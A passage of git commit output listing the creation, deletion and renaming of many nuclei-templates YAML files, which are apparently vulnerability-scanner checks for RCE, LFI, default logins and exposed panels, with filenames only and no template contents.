nuclei-templates/Other/hasura-graphql-ssrf-7905.yaml create mode 100644 nuclei-templates/Other/hb-audio-lfi-7911.yaml delete mode 100644 nuclei-templates/Other/hb-audio-lfi.yaml create mode 100644 nuclei-templates/Other/header-blind-time-sql-injection.yaml rename nuclei-templates/Other/{helpjuice-takeover-7925.yaml => helpjuice-takeover-7927.yaml} (100%) create mode 100644 nuclei-templates/Other/helprace-takeover-7931.yaml delete mode 100644 nuclei-templates/Other/helprace-takeover.yaml create mode 
100644 nuclei-templates/Other/hg255s.yaml create mode 100644 nuclei-templates/Other/hg532e.yaml create mode 100644 nuclei-templates/Other/hiboss-rce-7948.yaml delete mode 100644 nuclei-templates/Other/hiboss-rce-7949.yaml create mode 100644 nuclei-templates/Other/hide-security-enhancer-lfi-7952.yaml delete mode 100644 nuclei-templates/Other/hide-security-enhancer-lfi.yaml create mode 100644 nuclei-templates/Other/hikvision-detection-1.yaml create mode 100644 nuclei-templates/Other/hikvision-detection-7955.yaml delete mode 100644 nuclei-templates/Other/hikvision-detection.yaml rename nuclei-templates/Other/{hikvision-info-leak.yaml => hikvision-info-leak-7958.yaml} (100%) delete mode 100644 nuclei-templates/Other/hivemanager-login-panel-7966.yaml create mode 100644 nuclei-templates/Other/hivemanager-login-panel.yaml rename nuclei-templates/Other/{hjtcloud-arbitrary-file-read-7970.yaml => hjtcloud-arbitrary-file-read.yaml} (100%) create mode 100644 nuclei-templates/Other/hjtcloud-rest-arbitrary-file-read-7976.yaml delete mode 100644 nuclei-templates/Other/hjtcloud-rest-arbitrary-file-read.yaml rename nuclei-templates/Other/{hmc-hybris-panel-7978.yaml => hmc-hybris-panel-7977.yaml} (100%) delete mode 100644 nuclei-templates/Other/homeautomation-v3-openredirect-7982.yaml create mode 100644 nuclei-templates/Other/homeautomation-v3-openredirect.yaml rename nuclei-templates/Other/{3867691789.yaml => honeypot.yaml} (100%) create mode 100644 nuclei-templates/Other/honeywell-building-control-7987.yaml delete mode 100644 nuclei-templates/Other/honeywell-building-control.yaml create mode 100644 nuclei-templates/Other/honeywell-web-controller-7995.yaml delete mode 100644 nuclei-templates/Other/honeywell-web-controller.yaml delete mode 100644 nuclei-templates/Other/hongdian-default-login-7998.yaml create mode 100644 nuclei-templates/Other/hongdian-default-login.yaml rename nuclei-templates/Other/{hostheaderpoisoning.yaml => host-header-poisoning.yaml} (100%) create mode 100644 
nuclei-templates/Other/hp-blade-admin-detect-8005.yaml delete mode 100644 nuclei-templates/Other/hp-blade-admin-detect.yaml delete mode 100644 nuclei-templates/Other/hp-color-laserjet-detect-8006.yaml create mode 100644 nuclei-templates/Other/hp-color-laserjet-detect.yaml rename nuclei-templates/Other/{hp-device-info-detect-8009.yaml => hp-device-info-detect-8008.yaml} (100%) rename nuclei-templates/Other/{hp-ilo-5-8021.yaml => hp-ilo-5.yaml} (100%) rename nuclei-templates/Other/{hp-ilo-serial-key-disclosure-8025.yaml => hp-ilo-serial-key-disclosure-8023.yaml} (100%) delete mode 100644 nuclei-templates/Other/hp-laserjet-detect-8028.yaml create mode 100644 nuclei-templates/Other/hp-laserjet-detect.yaml create mode 100644 nuclei-templates/Other/hp-switch-default-login-8036.yaml delete mode 100644 nuclei-templates/Other/hp-switch-default-login.yaml create mode 100644 nuclei-templates/Other/hpe-system-management-anonymous-8013.yaml delete mode 100644 nuclei-templates/Other/hpe-system-management-anonymous.yaml rename nuclei-templates/Other/{hrsale-unauthenticated-lfi.yaml => hrsale-unauthenticated-lfi-8039.yaml} (100%) rename nuclei-templates/Other/{hst-fileread.yaml => hst-fileRead.yaml} (100%) create mode 100644 nuclei-templates/Other/htaccess-config-8044.yaml delete mode 100644 nuclei-templates/Other/htaccess-config.yaml rename nuclei-templates/Other/{htpasswd-detection.yaml => htpasswd-detection-8046.yaml} (100%) rename nuclei-templates/Other/{http-missing-security-headers.yaml => http-missing-security-headers-8058.yaml} (100%) rename nuclei-templates/Other/{http-raw-multiple.yaml => http-raw.yaml} (100%) rename nuclei-templates/Other/{http-hsts-header.yaml => http-xframe-header.yaml} (100%) rename nuclei-templates/Other/{httpbin-open-redirect.yaml => httpbin-open-redirect-8049.yaml} (100%) create mode 100644 nuclei-templates/Other/httpbin-panel-8051.yaml delete mode 100644 nuclei-templates/Other/httpbin-panel.yaml delete mode 100644 
nuclei-templates/Other/httpbin-xss-8052.yaml create mode 100644 nuclei-templates/Other/httpbin-xss-8053.yaml rename nuclei-templates/Other/{httpd-config-8055.yaml => httpd-config.yaml} (100%) delete mode 100644 nuclei-templates/Other/huawei-HG532e-default-router-login.yaml create mode 100644 nuclei-templates/Other/huawei-hg255s-lfi-8060.yaml delete mode 100644 nuclei-templates/Other/huawei-hg255s-lfi.yaml create mode 100644 nuclei-templates/Other/huawei-hg532e-default-router-login-8064.yaml create mode 100644 nuclei-templates/Other/huawei-hg532e-panel-8065.yaml delete mode 100644 nuclei-templates/Other/huawei-hg532e-panel.yaml rename nuclei-templates/Other/{huawei-home-gateway-8072.yaml => huawei-home-gateway.yaml} (100%) rename nuclei-templates/Other/{huawei-router-auth-bypass-8075.yaml => huawei-router-auth-bypass.yaml} (100%) rename nuclei-templates/Other/{huayu-reporter-fileread.yaml => huayu-Reporter-fileRead.yaml} (100%) rename nuclei-templates/Other/{huayu-reporter-rce.yaml => huayu-Reporter-rce.yaml} (100%) create mode 100644 nuclei-templates/Other/hubspot-takeover-8078.yaml delete mode 100644 nuclei-templates/Other/hubspot-takeover.yaml create mode 100644 nuclei-templates/Other/hubspot.yaml delete mode 100644 nuclei-templates/Other/hue-default-credential-8080.yaml create mode 100644 nuclei-templates/Other/hue-default-credential-8081.yaml create mode 100644 nuclei-templates/Other/hue.yaml create mode 100644 nuclei-templates/Other/huijietong-cloud-fileread-8082.yaml delete mode 100644 nuclei-templates/Other/huijietong-cloud-fileread-8085.yaml create mode 100644 nuclei-templates/Other/hybris.yaml create mode 100644 nuclei-templates/Other/ibm-advanced-system-management-8090.yaml delete mode 100644 nuclei-templates/Other/ibm-advanced-system-management.yaml create mode 100644 nuclei-templates/Other/ibm-friendly-path-exposure-1.yaml rename nuclei-templates/Other/{ibm-friendly-path-exposure-8093.yaml => ibm-friendly-path-exposure-8092.yaml} (100%) delete mode 
100644 nuclei-templates/Other/ibm-http-server-8097.yaml create mode 100644 nuclei-templates/Other/ibm-http-server.yaml rename nuclei-templates/Other/{ibm-infoprint-lfi.yaml => ibm-infoprint-lfi-8105.yaml} (100%) rename nuclei-templates/Other/{ibm-sterling-detect-8122.yaml => ibm-sterling-detect.yaml} (100%) rename nuclei-templates/Other/{ibm-storage-default-credential-8125.yaml => ibm-storage-default-credential-8123.yaml} (100%) rename nuclei-templates/Other/{iceflow-vpn-disclosure.yaml => iceflow-vpn-disclosure-8128.yaml} (100%) create mode 100644 nuclei-templates/Other/icewarp-webclient-rce-8131.yaml delete mode 100644 nuclei-templates/Other/icewarp-webclient-rce.yaml delete mode 100644 nuclei-templates/Other/idemia-biometrics-default-login-8139.yaml create mode 100644 nuclei-templates/Other/idemia-biometrics-default-login.yaml rename nuclei-templates/Other/{entrust-identityguard.yaml => identityguard-selfservice-entrust-8142.yaml} (100%) rename nuclei-templates/Other/{IDOR-vuln-params.yaml => idor-vuln-params(1).yaml} (100%) create mode 100644 nuclei-templates/Other/iis-internal-ip-disclosure-8148.yaml delete mode 100644 nuclei-templates/Other/iis-internal-ip-disclosure.yaml rename nuclei-templates/Other/{influxdb-detect-8159.yaml => influxdb-detect-8160.yaml} (100%) rename nuclei-templates/Other/{insecure-firebase-database.yaml => insecure-firebase-database-8161.yaml} (100%) delete mode 100644 nuclei-templates/Other/inspur-clusterengine-default-login-8162.yaml create mode 100644 nuclei-templates/Other/inspur-clusterengine-default-login.yaml create mode 100644 nuclei-templates/Other/instagram.yaml create mode 100644 nuclei-templates/Other/integrated_management_module.yaml rename nuclei-templates/Other/{intelbras-login.yaml => intelbras-login-8163.yaml} (100%) rename nuclei-templates/Other/{interactsh-server.yaml => interactsh-server-8165.yaml} (100%) rename nuclei-templates/Other/{intercom-takeover-8166.yaml => intercom-takeover-8167.yaml} (100%) rename 
nuclei-templates/Other/{internet-service-8177.yaml => internet-service-8178.yaml} (100%) rename nuclei-templates/Other/{iotawatt-app-exposure.yaml => iotawatt-app-exposure-8187.yaml} (100%) create mode 100644 nuclei-templates/Other/iplanet-web-server-8191.yaml delete mode 100644 nuclei-templates/Other/iplanet-web-server.yaml delete mode 100644 nuclei-templates/Other/ipstack.yaml create mode 100644 nuclei-templates/Other/iptime-default-login-8194.yaml delete mode 100644 nuclei-templates/Other/iptime-default-login.yaml rename nuclei-templates/Other/{iptime-router.yaml => iptime-router-8195.yaml} (100%) rename nuclei-templates/Other/{issuu-panel-lfi-8199.yaml => issuu-panel-lfi-8200.yaml} (100%) rename nuclei-templates/Other/{api-iterable-445.yaml => iterable.yaml} (100%) delete mode 100644 nuclei-templates/Other/itop-detect-8201.yaml create mode 100644 nuclei-templates/Other/itop-detect-8203.yaml delete mode 100644 nuclei-templates/Other/itop-panel-8205.yaml create mode 100644 nuclei-templates/Other/itop-panel.yaml delete mode 100644 nuclei-templates/Other/ixcache-panel-8206.yaml create mode 100644 nuclei-templates/Other/ixcache-panel.yaml delete mode 100644 nuclei-templates/Other/jamf-blind-xxe-8209.yaml create mode 100644 nuclei-templates/Other/jamf-blind-xxe.yaml create mode 100644 nuclei-templates/Other/jamf-panel-8216.yaml delete mode 100644 nuclei-templates/Other/jamf-panel.yaml create mode 100644 nuclei-templates/Other/jaspersoft-detect.yaml create mode 100644 nuclei-templates/Other/java-melody-exposed-1.yaml create mode 100644 nuclei-templates/Other/java-melody-exposed-2.yaml rename nuclei-templates/Other/{java-melody-exposed-8221.yaml => java-melody-exposed-8224.yaml} (100%) create mode 100644 nuclei-templates/Other/jboss-seam-debug-page-8239.yaml delete mode 100644 nuclei-templates/Other/jboss-seam-debug-page.yaml create mode 100644 nuclei-templates/Other/jbpm.yaml mode change 100755 => 100644 nuclei-templates/Other/jdbc-connection-string.yaml delete mode 
100644 nuclei-templates/Other/jeecg-boot-detect-8247.yaml create mode 100644 nuclei-templates/Other/jeecg-boot-detect-8248.yaml delete mode 100644 nuclei-templates/Other/jeesite-default-login.yaml rename nuclei-templates/Other/{JEEWMS-fileRead.yaml => jeewms-fileread.yaml} (100%) rename nuclei-templates/Other/{jeewms-lfi-8254.yaml => jeewms-lfi-8255.yaml} (100%) rename nuclei-templates/Other/{jellyfin-detect.yaml => jellyfin-detect-8257.yaml} (100%) rename nuclei-templates/{CVE-2024/cve-2024-23897.yaml => Other/jenk.yaml} (100%) create mode 100644 nuclei-templates/Other/jenkins-asyncpeople-8267.yaml delete mode 100644 nuclei-templates/Other/jenkins-asyncpeople.yaml create mode 100644 nuclei-templates/Other/jenkins-default-8273.yaml delete mode 100644 nuclei-templates/Other/jenkins-default-login.yaml rename nuclei-templates/Other/{jenkins-detect.yaml => jenkins-detect-8275.yaml} (100%) rename nuclei-templates/Other/{jenkins-script-8281.yaml => jenkins-script-8284.yaml} (100%) rename nuclei-templates/Other/{jenkins-stack-trace-8287.yaml => jenkins-stack-trace-8285.yaml} (100%) rename nuclei-templates/Other/{jetbrains-datasources.yaml => jetbrains-datasources-8291.yaml} (100%) rename nuclei-templates/Other/{jfrog-8303.yaml => jfrog-8304.yaml} (100%) create mode 100644 nuclei-templates/Other/jfrog-unauth-build-exposed-8302.yaml delete mode 100644 nuclei-templates/Other/jfrog-unauth-build-exposed.yaml delete mode 100644 nuclei-templates/Other/jira-detect-8316.yaml create mode 100644 nuclei-templates/Other/jira-detect.yaml delete mode 100644 nuclei-templates/Other/jira-service-desk-signup-8320.yaml create mode 100644 nuclei-templates/Other/jira-service-desk-signup-8321.yaml delete mode 100644 nuclei-templates/Other/jira-unauthenticated-dashboards-8323.yaml create mode 100644 nuclei-templates/Other/jira-unauthenticated-dashboards.yaml create mode 100644 nuclei-templates/Other/jira-unauthenticated-popular-filters.yaml rename 
nuclei-templates/Other/{jira-unauthenticated-projects.yaml => jira-unauthenticated-projects-8335.yaml} (100%) rename nuclei-templates/Other/{jira-unauthenticated-screens.yaml => jira-unauthenticated-screens-8338.yaml} (100%) delete mode 100644 nuclei-templates/Other/jira-unauthenticated-user-picker.yaml create mode 100644 nuclei-templates/Other/jira_user_piker.yaml create mode 100644 nuclei-templates/Other/jitsi-meet.yaml create mode 100644 nuclei-templates/Other/jkstatus-manager-8347.yaml delete mode 100644 nuclei-templates/Other/jkstatus-manager.yaml create mode 100644 nuclei-templates/Other/jmx-default-login-8356.yaml delete mode 100644 nuclei-templates/Other/jmx-default-login.yaml create mode 100644 nuclei-templates/Other/jolokia-mbean-search-8363.yaml delete mode 100644 nuclei-templates/Other/jolokia-mbean-search.yaml create mode 100644 nuclei-templates/Other/jolokia-unauthenticated-lfi-8364.yaml delete mode 100644 nuclei-templates/Other/jolokia-unauthenticated-lfi.yaml delete mode 100644 nuclei-templates/Other/joomla-com-fabrik-lfi-8370.yaml create mode 100644 nuclei-templates/Other/joomla-com-fabrik-lfi-8373.yaml rename nuclei-templates/Other/{joomla-htaccess.yaml => joomla-htaccess-8382.yaml} (100%) delete mode 100644 nuclei-templates/Other/joomla-manifest-file-8386.yaml create mode 100644 nuclei-templates/Other/joomla-manifest-file-8387.yaml rename nuclei-templates/Other/{joomla-panel.yaml => joomla-panel-8391.yaml} (100%) create mode 100644 nuclei-templates/Other/joomla-workflow-8395.yaml delete mode 100644 nuclei-templates/Other/joomla-workflow.yaml delete mode 100644 nuclei-templates/Other/jupyter-ipython-unauth-8402.yaml create mode 100644 nuclei-templates/Other/jupyter-ipython-unauth-8405.yaml create mode 100644 nuclei-templates/Other/jupyterhub-default-login-8401.yaml delete mode 100644 nuclei-templates/Other/jupyterhub-default-login.yaml create mode 100644 nuclei-templates/Other/jwt-token-8410.yaml delete mode 100644 
nuclei-templates/Other/jwt-token.yaml rename nuclei-templates/Other/{kafdrop-xss.yaml => kafdrop-xss-8411.yaml} (100%) create mode 100644 nuclei-templates/Other/kafka-center-default-login-8416.yaml delete mode 100644 nuclei-templates/Other/kafka-center-default-login.yaml rename nuclei-templates/Other/{kafka-connect-ui.yaml => kafka-connect-ui-8423.yaml} (100%) delete mode 100644 nuclei-templates/Other/kafka-cruise-control-8427.yaml create mode 100644 nuclei-templates/Other/kafka-cruise-control.yaml rename nuclei-templates/Other/{kafka-monitoring.yaml => kafka-monitoring-8431.yaml} (100%) create mode 100644 nuclei-templates/Other/kafka-topics-ui-8434.yaml delete mode 100644 nuclei-templates/Other/kafka-topics-ui.yaml create mode 100644 nuclei-templates/Other/karaf.yaml rename nuclei-templates/Other/{Karel-ip-phone-lfi.yaml => karel-ip-phone-lfi-8436.yaml} (100%) delete mode 100644 nuclei-templates/Other/kenesto-login-8445.yaml create mode 100644 nuclei-templates/Other/kenesto-login.yaml create mode 100644 nuclei-templates/Other/kentico-login-8446.yaml delete mode 100644 nuclei-templates/Other/kentico-login.yaml rename nuclei-templates/Other/{kerio-connect-client.yaml => kerio-connect-client-8452.yaml} (100%) rename nuclei-templates/Other/{kevinlab-device-detect.yaml => kevinlab-device-detect-8462.yaml} (100%) rename nuclei-templates/Other/{kevinlab-hems-backdoor.yaml => kevinlab-hems-backdoor-8465.yaml} (100%) create mode 100644 nuclei-templates/Other/keycloak-openid-config-8477.yaml delete mode 100644 nuclei-templates/Other/keycloak-openid-config.yaml create mode 100644 nuclei-templates/Other/keycloak-xss-8482.yaml create mode 100644 nuclei-templates/Other/kibana-detect-8484.yaml delete mode 100644 nuclei-templates/Other/kibana-detect.yaml create mode 100644 nuclei-templates/Other/kingdee-eas-directory-traversal-8489.yaml delete mode 100644 nuclei-templates/Other/kingdee-eas-directory-traversal.yaml create mode 100644 nuclei-templates/Other/kingsoft_antivirus.yaml 
rename nuclei-templates/Other/{kinsta-takeover.yaml => kinsta-takeover-8493.yaml} (100%) create mode 100644 nuclei-templates/Other/kio_firmware.yaml create mode 100644 nuclei-templates/Other/kiwi_tcms.yaml create mode 100644 nuclei-templates/Other/kiwitcms-json-rpc.yaml rename nuclei-templates/Other/{kong-detect-8500.yaml => kong-detect-8499.yaml} (100%) rename nuclei-templates/Other/{Konga-default-login.yaml => konga-default-login.yaml} (100%) create mode 100644 nuclei-templates/Other/kube-api-pods-8510.yaml delete mode 100644 nuclei-templates/Other/kube-api-pods.yaml create mode 100644 nuclei-templates/Other/kube-api-secrets-8512.yaml delete mode 100644 nuclei-templates/Other/kube-api-secrets.yaml rename nuclei-templates/Other/{kube-api-services.yaml => kube-api-services-8513.yaml} (100%) delete mode 100644 nuclei-templates/Other/kube-dashboard-detect.yaml delete mode 100644 nuclei-templates/Other/kubelet-healthz-8518.yaml create mode 100644 nuclei-templates/Other/kubelet-healthz-8519.yaml delete mode 100644 nuclei-templates/Other/kubelet-metrics-8521.yaml create mode 100644 nuclei-templates/Other/kubelet-metrics.yaml create mode 100644 nuclei-templates/Other/kubelet-pods-8522.yaml delete mode 100644 nuclei-templates/Other/kubelet-pods.yaml delete mode 100644 nuclei-templates/Other/kubernetes-api-detect.yaml create mode 100644 nuclei-templates/Other/kubernetes-enterprise-manager-8529.yaml delete mode 100644 nuclei-templates/Other/kubernetes-enterprise-manager.yaml delete mode 100644 nuclei-templates/Other/kubernetes-metrics-8536.yaml create mode 100644 nuclei-templates/Other/kubernetes-metrics.yaml create mode 100644 nuclei-templates/Other/kubernetes-pods-8542.yaml delete mode 100644 nuclei-templates/Other/kubernetes-pods-8543.yaml rename nuclei-templates/Other/{kubernetes-resource-report-8549.yaml => kubernetes-resource-report.yaml} (100%) delete mode 100644 nuclei-templates/Other/kyan-network-credentials-disclosure-8556.yaml create mode 100644 
nuclei-templates/Other/kyan-network-credentials-disclosure.yaml create mode 100644 nuclei-templates/Other/kyocera-m2035dn-lfi-8558.yaml delete mode 100644 nuclei-templates/Other/kyocera-m2035dn-lfi.yaml rename nuclei-templates/Other/{lacie-panel.yaml => lacie-panel-8561.yaml} (100%) create mode 100644 nuclei-templates/Other/lancom-router-panel-8562.yaml delete mode 100644 nuclei-templates/Other/lancom-router-panel.yaml create mode 100644 nuclei-templates/Other/landfill-remote-monitoring-control.yaml create mode 100644 nuclei-templates/Other/landingi-takeover-8566.yaml delete mode 100644 nuclei-templates/Other/landingi-takeover.yaml rename nuclei-templates/Other/{landray-oa-fileread-8571.yaml => landray-oa-fileread-8569.yaml} (100%) rename nuclei-templates/Other/{lansweeper-login.yaml => lansweeper-login-8573.yaml} (100%) rename nuclei-templates/Other/{laravel-debug-enabled.yaml => laravel-debug-enabled-8577.yaml} (100%) create mode 100644 nuclei-templates/Other/laravel-env-8581.yaml delete mode 100644 nuclei-templates/Other/laravel-env.yaml delete mode 100644 nuclei-templates/Other/laravel-filemanager-8590.yaml create mode 100644 nuclei-templates/Other/laravel-filemanager-8591.yaml create mode 100644 nuclei-templates/Other/laravel-ignition-xss-8592.yaml delete mode 100644 nuclei-templates/Other/laravel-ignition-xss.yaml create mode 100644 nuclei-templates/Other/laravel-log-file-8597.yaml delete mode 100644 nuclei-templates/Other/laravel-log-file-8598.yaml create mode 100644 nuclei-templates/Other/laravel-telescope-8601.yaml delete mode 100644 nuclei-templates/Other/laravel-telescope.yaml create mode 100644 nuclei-templates/Other/lazy-file-8607.yaml delete mode 100644 nuclei-templates/Other/lazy-file.yaml create mode 100644 nuclei-templates/Other/leira-cron-jobs.yaml create mode 100644 nuclei-templates/Other/leira-roles.yaml delete mode 100644 nuclei-templates/Other/leostream-detection.yaml create mode 100644 nuclei-templates/Other/leostream-panel.yaml delete mode 
100644 nuclei-templates/Other/lfi-keyed.yaml create mode 100644 nuclei-templates/Other/lfi-linux-fuzz.yaml delete mode 100644 nuclei-templates/Other/lfi.yaml create mode 100644 nuclei-templates/Other/lfr_express.yaml create mode 100644 nuclei-templates/Other/liferay-portal-detect-8625.yaml delete mode 100644 nuclei-templates/Other/liferay-portal-detect-8626.yaml create mode 100644 nuclei-templates/Other/lighttpd-default.yaml rename nuclei-templates/Other/{linkedin-id.yaml => linkedin-client-id.yaml} (100%) rename nuclei-templates/Other/{linkerd-detect-8632.yaml => linkerd-detect-8633.yaml} (100%) delete mode 100644 nuclei-templates/Other/linkerd-ssrf-detect-8637.yaml create mode 100644 nuclei-templates/Other/linkerd-ssrf-detect.yaml delete mode 100644 nuclei-templates/Other/linksys-wifi-login-8644.yaml create mode 100644 nuclei-templates/Other/linksys-wifi-login.yaml delete mode 100644 nuclei-templates/Other/linux-lfi-fuzz.yaml create mode 100644 nuclei-templates/Other/linux-lfi-fuzzing.yaml create mode 100644 nuclei-templates/Other/liveview-axis-camera-8647.yaml delete mode 100644 nuclei-templates/Other/liveview-axis-camera.yaml rename nuclei-templates/Other/{log4j-fuzz-head-poc.yaml => log4j-fuzz-head-poc-v1.yaml} (100%) delete mode 100644 nuclei-templates/Other/log4j-fuzz-head-poc-v2.yaml rename nuclei-templates/Other/{log4jshell-detect.yaml => log4j-url.yaml} (100%) create mode 100644 nuclei-templates/Other/loganalyzer.yaml rename nuclei-templates/Other/{logins (copy 1).yaml => logins.yaml} (100%) create mode 100644 nuclei-templates/Other/logstash.yaml rename nuclei-templates/Other/{api-loqate-453.yaml => loqate.yaml} (100%) delete mode 100644 nuclei-templates/Other/lotus-domino-version-8654.yaml create mode 100644 nuclei-templates/Other/lotus-domino-version.yaml create mode 100644 nuclei-templates/Other/lotuscms-rce-8653.yaml delete mode 100644 nuclei-templates/Other/lotuscms-rce.yaml create mode 100644 nuclei-templates/Other/lucas-string-replace.yaml create 
mode 100644 nuclei-templates/Other/lucee-login-8665.yaml delete mode 100644 nuclei-templates/Other/lucee-login.yaml create mode 100644 nuclei-templates/Other/lucee-stack-trace-8668.yaml delete mode 100644 nuclei-templates/Other/lucee-stack-trace-8669.yaml rename nuclei-templates/Other/{lutron-iot-default-login-8678.yaml => lutron-iot-default-login-8675.yaml} (100%) create mode 100644 nuclei-templates/Other/maccmsv10-backdoor-8683.yaml delete mode 100644 nuclei-templates/Other/maccmsv10-backdoor.yaml rename nuclei-templates/Other/{magento-2-exposed-api.yaml => magento-2-exposed-api-8688.yaml} (100%) delete mode 100644 nuclei-templates/Other/magento-admin-panel-8693.yaml create mode 100644 nuclei-templates/Other/magento-admin-panel.yaml rename nuclei-templates/Other/{magento-cacheleak.yaml => magento-cacheleak-8699.yaml} (100%) create mode 100644 nuclei-templates/Other/magento-config-8703.yaml delete mode 100644 nuclei-templates/Other/magento-config.yaml create mode 100644 nuclei-templates/Other/magento-unprotected-dev-files-8708.yaml delete mode 100644 nuclei-templates/Other/magento-unprotected-dev-files-8709.yaml delete mode 100644 nuclei-templates/Other/magicflow-lfi-8710.yaml create mode 100644 nuclei-templates/Other/magicflow-lfi-8713.yaml create mode 100644 nuclei-templates/Other/magnolia_cms.yaml create mode 100644 nuclei-templates/Other/mailchimp-api(1).yaml delete mode 100644 nuclei-templates/Other/mailchimp-api-key-8722.yaml create mode 100644 nuclei-templates/Other/mailchimp-api-key-8724.yaml create mode 100644 nuclei-templates/Other/mailchimp.yaml delete mode 100644 nuclei-templates/Other/mailgun-api.yaml rename nuclei-templates/Other/{manageengine-adaudit.yaml => manageengine-adaudit-8730.yaml} (100%) create mode 100644 nuclei-templates/Other/manageengine-apex-helpdesk-8748.yaml delete mode 100644 nuclei-templates/Other/manageengine-apex-helpdesk.yaml rename nuclei-templates/Other/{manageengine-applications-manager.yaml => 
manageengine-applications-manager-8753.yaml} (100%) create mode 100644 nuclei-templates/Other/manageengine-assetexplorer-8756.yaml delete mode 100644 nuclei-templates/Other/manageengine-assetexplorer-8757.yaml delete mode 100644 nuclei-templates/Other/manageengine-opmanager-8768.yaml create mode 100644 nuclei-templates/Other/manageengine-opmanager.yaml delete mode 100644 nuclei-templates/Other/manageengine-supportcenter-8775.yaml create mode 100644 nuclei-templates/Other/manageengine-supportcenter.yaml create mode 100644 nuclei-templates/Other/manageengine_netflow_analyzer.yaml rename nuclei-templates/Other/{mantis-detect.yaml => mantis-detect-8780.yaml} (100%) create mode 100644 nuclei-templates/Other/mantisbt-default-credential-8778.yaml rename nuclei-templates/Other/{mashery-takeover-8786.yaml => mashery-takeover-8785.yaml} (100%) rename nuclei-templates/Other/{Maticsoft-Shop-sqli.yaml => maticsoft-shop-sqli.yaml} (100%) rename nuclei-templates/Other/{mautic-crm-panel.yaml => mautic-crm-panel-8789.yaml} (100%) rename nuclei-templates/Other/{mcafee-epo-rce-8790.yaml => mcafee-epo-rce-8793.yaml} (100%) create mode 100644 nuclei-templates/Other/medium-takeover-8798.yaml delete mode 100644 nuclei-templates/Other/medium-takeover.yaml rename nuclei-templates/Other/{metabase-panel.yaml => metabase-panel-8806.yaml} (100%) create mode 100644 nuclei-templates/Other/metadata-alibaba-8808.yaml delete mode 100644 nuclei-templates/Other/metadata-alibaba.yaml rename nuclei-templates/Other/{metadata-azure.yaml => metadata-azure-8814.yaml} (100%) rename nuclei-templates/Other/{metadata-digitalocean-8817.yaml => metadata-digitalocean-8818.yaml} (100%) rename nuclei-templates/Other/{metadata-google.yaml => metadata-google-8820.yaml} (100%) delete mode 100644 nuclei-templates/Other/metadata-openstack-8826.yaml create mode 100644 nuclei-templates/Other/metadata-openstack-8828.yaml create mode 100644 nuclei-templates/Other/metadata-oracle-8831.yaml delete mode 100644 
nuclei-templates/Other/metadata-oracle.yaml delete mode 100644 nuclei-templates/Other/metatag-cms-8832.yaml create mode 100644 nuclei-templates/Other/metatag-cms-8833.yaml create mode 100644 nuclei-templates/Other/metersphere-plugin-rce-8837.yaml delete mode 100644 nuclei-templates/Other/metersphere-plugin-rce.yaml create mode 100644 nuclei-templates/Other/metinfo-lfi-8840.yaml delete mode 100644 nuclei-templates/Other/metinfo-lfi.yaml delete mode 100644 nuclei-templates/Other/microsoft-echange-server-detect.yaml rename nuclei-templates/Other/{microsoft-exchange-login.yaml => microsoft-exchange-login-8846.yaml} (100%) create mode 100644 nuclei-templates/Other/microsoft-exchange-panel-8848.yaml delete mode 100644 nuclei-templates/Other/microsoft-exchange-panel.yaml create mode 100644 nuclei-templates/Other/microsoft-exchange-server-detect-8854.yaml rename nuclei-templates/Other/{microsoft-exchange-workflow.yaml => microsoft-exchange-workflow-8855.yaml} (100%) delete mode 100755 nuclei-templates/Other/microsoft-teams-webhook-8856.yaml create mode 100644 nuclei-templates/Other/microsoft-teams-webhook-8858.yaml create mode 100644 nuclei-templates/Other/microweber-detect-8862.yaml delete mode 100644 nuclei-templates/Other/microweber-detect.yaml create mode 100644 nuclei-templates/Other/mikrotik-graph-8870.yaml delete mode 100644 nuclei-templates/Other/mikrotik-graph.yaml create mode 100644 nuclei-templates/Other/minimouse-lfi-8880.yaml delete mode 100644 nuclei-templates/Other/minimouse-lfi.yaml delete mode 100644 nuclei-templates/Other/minio-browser-8882.yaml create mode 100644 nuclei-templates/Other/minio-browser-8883.yaml delete mode 100644 nuclei-templates/Other/minio-console-8886.yaml create mode 100644 nuclei-templates/Other/minio-console.yaml rename nuclei-templates/Other/{minio-default-login-8889.yaml => minio-default-login-8888.yaml} (100%) mode change 100755 => 100644 nuclei-templates/Other/minio-default-password-8891.yaml mode change 100755 => 100644 
nuclei-templates/Other/minio-detect-8892.yaml delete mode 100644 nuclei-templates/Other/mirai-unknown-rce-8899.yaml create mode 100644 nuclei-templates/Other/mirai-unknown-rce.yaml delete mode 100644 nuclei-templates/Other/misconfigured-docker-8900.yaml create mode 100644 nuclei-templates/Other/misconfigured-docker.yaml create mode 100644 nuclei-templates/Other/mobileiron-log4j-jndi-rce-8905.yaml delete mode 100644 nuclei-templates/Other/mobileiron-log4j-jndi-rce.yaml rename nuclei-templates/Other/{mobotix-guest-camera.yaml => mobotix-guest-camera-8911.yaml} (100%) rename nuclei-templates/Other/{moinmoin-detect.yaml => moinmoin-detect-8916.yaml} (100%) create mode 100644 nuclei-templates/Other/mongodb-detect-8920.yaml delete mode 100644 nuclei-templates/Other/mongodb-detect.yaml create mode 100644 nuclei-templates/Other/mongodb-ops-manager-8922.yaml delete mode 100644 nuclei-templates/Other/mongodb-ops-manager.yaml delete mode 100644 nuclei-templates/Other/mongodb-unauth-8926.yaml create mode 100644 nuclei-templates/Other/mongodb-unauth.yaml delete mode 100644 nuclei-templates/Other/monitorix-exposure-8929.yaml create mode 100644 nuclei-templates/Other/monitorix-exposure-8933.yaml delete mode 100644 nuclei-templates/Other/moodle-changelog-8934.yaml create mode 100644 nuclei-templates/Other/moodle-changelog-8935.yaml create mode 100644 nuclei-templates/Other/moodle-filter-jmol-lfi-8937.yaml delete mode 100644 nuclei-templates/Other/moodle-filter-jmol-lfi.yaml create mode 100644 nuclei-templates/Other/moodle-filter-jmol-xss-8942.yaml delete mode 100644 nuclei-templates/Other/moodle-filter-jmol-xss-8945.yaml delete mode 100644 nuclei-templates/Other/moodle-xss-8950.yaml create mode 100644 nuclei-templates/Other/moodle-xss.yaml rename nuclei-templates/Other/{signatures-10245.yaml => moodle.yaml} (100%) delete mode 100644 nuclei-templates/Other/moveit-detect.yaml create mode 100644 nuclei-templates/Other/moveit-transfer-detect.yaml delete mode 100644 
